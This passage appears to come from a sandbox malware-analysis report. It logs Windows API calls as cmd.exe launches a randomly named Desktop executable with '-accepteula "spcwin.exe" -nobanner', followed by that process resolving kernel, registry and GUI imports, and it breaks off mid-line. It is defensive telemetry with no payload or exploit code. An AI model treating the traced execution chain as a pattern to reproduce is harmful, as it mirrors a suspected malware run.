_wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0175.487] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0175.488] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0175.488] GetProcessHeap () returned 0x6a0000 [0175.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x210) returned 0x6b24e8 [0175.488] GetProcessHeap () returned 0x6a0000 [0175.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x6a) returned 0x6b2700 [0175.488] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0175.489] GetProcessHeap () returned 0x6a0000 [0175.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x418) returned 0x6b2778 [0175.489] SetErrorMode (uMode=0x0) returned 0x0 [0175.489] SetErrorMode (uMode=0x1) returned 0x0 [0175.489] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b2780, lpFilePart=0x2ff098 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ff098*="Desktop") returned 0x25 [0175.489] SetErrorMode (uMode=0x0) returned 0x1 [0175.489] GetProcessHeap () returned 0x6a0000 [0175.489] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b2778, Size=0x6e) returned 0x6b2778 [0175.489] GetProcessHeap () returned 0x6a0000 [0175.489] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6b2778) returned 0x6e [0175.489] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.489] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.489] GetProcessHeap () returned 0x6a0000 [0175.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x120) returned 0x6b27f0 [0175.490] GetProcessHeap () returned 0x6a0000 [0175.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x238) returned 0x6b2918 [0175.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.500] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x2fee34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fee34) returned 0x6b2ac8 [0175.500] GetProcessHeap () returned 0x6a0000 [0175.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b2b08 [0175.501] FindClose (in: hFindFile=0x6b2ac8 | out: hFindFile=0x6b2ac8) returned 1 [0175.501] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0175.501] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0175.501] GetConsoleTitleW (in: lpConsoleTitle=0x2ff30c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.501] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ff194, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ff25c | out: lpAttributeList=0x2ff194, lpSize=0x2ff25c) returned 1 [0175.501] UpdateProcThreadAttribute (in: lpAttributeList=0x2ff194, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ff254, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ff194, lpPreviousValue=0x0) returned 1 [0175.501] GetStartupInfoW (in: lpStartupInfo=0x2ff150 | out: lpStartupInfo=0x2ff150*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0175.502] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0175.503] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ff1f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ff23c | out: lpCommandLine="tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner", lpProcessInformation=0x2ff23c*(hProcess=0x78, hThread=0x74, dwProcessId=0x358, dwThreadId=0x5a8)) returned 1 [0175.517] CloseHandle (hObject=0x74) returned 1 [0175.517] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0175.518] GetProcessHeap () returned 0x6a0000 [0175.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b2d58 | out: hHeap=0x6a0000) returned 1 [0175.518] GetEnvironmentStringsW () returned 0x6b2b28* [0175.518] GetProcessHeap () returned 0x6a0000 [0175.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb7c) returned 0x6b7278 [0175.518] FreeEnvironmentStringsW (penv=0x6b2b28) returned 1 [0175.518] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0189.137] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ff130 | out: lpExitCode=0x2ff130*=0x1) returned 1 [0189.138] CloseHandle (hObject=0x78) returned 1 [0189.138] _vsnwprintf (in: _Buffer=0x2ff278, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ff13c | out: _Buffer="00000001") returned 8 [0189.138] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0189.138] GetProcessHeap () returned 0x6a0000 [0189.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7278 | out: hHeap=0x6a0000) returned 1 [0189.138] GetEnvironmentStringsW () returned 0x6b2b28* [0189.138] GetProcessHeap () returned 0x6a0000 [0189.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb7c) returned 0x6b7278 [0189.138] FreeEnvironmentStringsW (penv=0x6b2b28) returned 1 [0189.138] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.138] GetProcessHeap () returned 0x6a0000 [0189.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7278 | out: hHeap=0x6a0000) returned 1 [0189.139] GetEnvironmentStringsW () returned 0x6b2b28* [0189.139] GetProcessHeap () returned 0x6a0000 [0189.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb7c) returned 0x6b7278 [0189.139] FreeEnvironmentStringsW (penv=0x6b2b28) returned 1 [0189.139] GetProcessHeap () returned 0x6a0000 [0189.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b00b0 | out: hHeap=0x6a0000) returned 1 [0189.139] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ff194 | out: lpAttributeList=0x2ff194) [0189.139] _get_osfhandle (_FileHandle=1) returned 0x80 [0189.139] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0189.140] _get_osfhandle (_FileHandle=1) returned 0x80 [0189.140] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0189.140] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.140] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0189.140] SetConsoleInputExeNameW () returned 0x1 [0189.141] GetConsoleOutputCP () returned 0x1b5 [0189.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0189.141] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.141] exit (_Code=1) Process: id = "171" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2fe85000" os_pid = "0x358" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "170" os_parent_pid = "0x798" cmd_line = "tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 698 os_tid = 0x5a8 [0182.105] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0182.105] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0182.105] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0182.156] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0182.169] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0182.171] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0182.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0182.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0182.173] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0182.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0182.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0182.173] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0182.173] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0182.174] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0182.174] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0182.174] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0182.174] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0182.175] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0182.175] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0182.175] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0182.176] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0182.176] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0182.176] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0182.176] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0182.177] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0182.177] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0182.177] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0182.177] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0182.177] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0182.177] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0182.178] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0182.178] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0182.178] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0182.178] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0182.178] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0182.178] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0182.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0182.179] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0182.179] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0182.179] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0182.179] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0182.179] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0182.180] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0182.181] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0182.181] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0182.181] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0182.181] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0182.181] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0182.182] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0182.182] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0182.182] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0182.182] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0182.182] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0182.183] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0182.183] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0182.183] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0182.183] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0182.183] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0182.184] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0182.184] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0182.184] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0182.184] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0182.184] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0182.184] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0182.185] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0182.185] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0182.185] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0182.185] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0182.185] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0182.185] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0182.186] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0182.186] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0182.186] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0182.186] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0182.186] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0182.187] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0182.187] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0182.188] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0182.189] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0182.189] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0182.189] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0182.189] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0182.190] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0182.190] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0182.190] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0183.119] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0183.120] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0183.120] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0183.120] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0183.120] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0183.120] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0183.120] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0183.120] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0183.121] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0183.121] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0183.162] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0183.162] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0183.164] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0183.164] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0183.167] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0183.190] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0183.190] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0183.190] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0183.190] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0183.190] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0183.190] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0183.191] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0183.191] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0183.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x266d56c0, dwHighDateTime=0x1d68287)) [0183.208] GetCurrentThreadId () returned 0x5a8 [0183.208] GetCurrentProcessId () returned 0x358 [0183.208] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=30354740146) returned 1 [0183.217] GetProcessHeap () returned 0x2f0000 [0184.228] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0184.229] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0184.230] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0184.230] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0184.230] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0184.230] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0184.231] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0184.231] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0184.231] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0184.231] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0184.231] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0184.232] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0184.232] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0184.232] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0184.233] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0184.233] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0184.233] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0184.233] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0184.233] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0184.234] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0184.234] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0184.235] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0184.235] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0184.235] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0184.235] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0184.236] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0184.236] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0184.236] GetProcAddress (hModule=0x76d30000, 